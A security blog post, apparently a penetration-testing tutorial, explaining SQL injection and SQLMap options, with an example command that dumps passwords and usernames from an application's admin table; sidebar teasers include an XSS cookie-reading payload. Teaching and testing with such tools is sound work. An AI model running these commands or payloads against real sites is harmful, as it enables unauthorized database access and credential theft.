Exploliting SQL injection flaws using SQLMap


A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands


SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMap comes by default with Backtrack,Kali frameworks and for windows the download is available at here

Note: Only Python 2.7 has to be installed to run SQLMap

Syntax of execution in windows

python sqlmap.py -u "http://www.application.com"

The options on sqlmap are

Option
Use
-u
Specify a particular vulnerable URL
--dbs
Retrieve all the databases in the server
--current-db
Retrieve the application database
--dbms=mysql
To specify that the backend database is mysql
-D  dbname
To select a particular database
--tables
Retrieve all the tables in the database
-T  tablename
To Select a particular table
--columns
Retrieve all the columns in the table specified
-C columnname
To retrieve a specific column
--dump
To get the entire table/database

Example query:
python sqlmap.py -u http://www.abcapplicastion.com/viewfaculty.php?id=12 -D results -T admin -C id,passwrd,u_name --dump


Comments

Post a Comment

Popular posts from this blog

Importance of enabling Secure and HTTPOnly flag for cookies

Image
Often automated scan results give lot of false positives, some may be legitimate and some are as per design which can be omitted. Most automated scanners give medium level vulnerabilities when the session identifier cookie does not have HTTPOnly and Secure flag enabled. What exactly is the problem? What happens if these flags are disabled for a session identifier? Let me explain as follows: HTTPOnly: The Httponly flag is an additional property that is added to cookies which helps to mitigate accessing cookie information through XSS. Which means declaring a cookie to httponly will restrict the client side script from accessing the cookie and return an empty string Exploitation: Consider a web application which doesn't have HTTPOnly flag enabled, auth_token is the session identifier of the application,upon executing the <script>alert(document.cookie)</script> in the application the output would be  Now let us enable the HTTPOnly flag on the s...
Read more

My encounter with successful social engineering attack

11/8/2018 9:41 AM - I was getting ready to Office when I received a call from one of our relatives, He was telling me about a hacking attempt on his email address due to which he was unable to receive any mail from yesterday, and an email is sent to all his contacts that he is in a life threatening situation in another country and he need money immediately. As a precaution he has changed his password but the issue didn't resolve. He was worried that his company's email and sensitive information is lost. He inquired if I can help him out since I was working in IT, I felt this was a opportunity for me to see hacking attempt first hand, I wanted to spend some time investigating in it, so I've asked him to share his mail details(Which is highly not recommended but at the situation I couldn't help it) and told him I'm heading to office and will have information by evening. This excitement to see what happened got the better off me, so I stayed back at home logging in...
Read more